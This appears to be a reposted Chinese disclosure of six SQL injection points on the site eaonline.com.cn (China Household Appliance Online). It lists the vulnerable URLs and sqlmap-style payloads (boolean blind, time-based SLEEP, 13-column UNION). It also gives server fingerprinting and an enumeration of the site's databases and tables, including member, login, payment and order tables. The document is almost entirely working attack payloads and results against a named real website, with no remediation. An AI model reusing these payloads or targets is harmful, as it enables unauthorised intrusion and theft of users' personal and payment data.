中国家电在线6处sql注入打包
程序员文章站
2022-03-16 16:13:51
https://www.eaonline.com.cn/chargezone/chargeContent.dll?id=1000
https://www.eaonline.c...
https://www.eaonline.com.cn/chargezone/chargeContent.dll?id=1000 https://www.eaonline.com.cn/chargezone/chargeList.dll?kind=b https://www.eaonline.com.cn/info/serviceContent.dll?id=82818 https://www.eaonline.com.cn/cpzs/cpzs.php?id=1369 https://www.eaonline.com.cn/info/infoContent.dll?id=123540 https://www.eaonline.com.cn/info/infoListnews.dll?id=10
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1000 AND 4867=4867
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1000 AND (SELECT * FROM (SELECT(SLEEP(5)))romR)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=-1160 UNION ALL SELECT NULL,NULL,CONCAT(0x71716a6271,0x4b635659414c526f736e535754657368654552735451486e776a444c64596d5045756b566f585854,0x717a766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[12:13:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
Database: cheaa [74 tables] +---------------------------------------+ | b_logins | | b_members | | b_products | | bbs | | bginfo | | bid | | cheaa_bbsrt | | cheaa_bginfo | | cheaa_cpzs | | cheaa_cpzstj | | cheaa_jdrw | | cheaa_zdyzt | | cheaamembers | | cheaaplbak | | city | | column_name | | commonproperty | | content | | customization | | customize | | eadgtj | | ealmtt | | enterprise | | enterpriseinfo | | enterpriseinfo_0813 | | enterpriseinfo_0815 | | flux | | info | | jituan | | loginlevel | | logins | | logins_0815 | | m_info | | members | | members_0813 | | members_0815 | | operators | | orders | | payment | | penster | | permissions | | personalinfo | | piccp | | picly | | picnews | | price | | privateproperty | | productchildtype | | producttype | | propertyname | | province | | publish | | publishbak3 | | rdpl | | re_bid | | relations | | source | | survey | | text | | titles | | tongxunlu | | toutiao | | txl | | users | | vote | | voteip | | wsdclilin | | xi_pic | | xiaolei | | yewu | | yxz | | zdyzt | | zhuanti | | ztlilin | +---------------------------------------+ Database: information_schema [28 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ Database: mysql [23 tables] +---------------------------------------+ | user | | columns_priv | | db | | event | | func | | general_log | | help_category | | help_keyword | | help_relation | | help_topic | | host | | ndb_binlog_index | | plugin | | proc | | procs_priv | | servers | | slow_log | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | +---------------------------------------+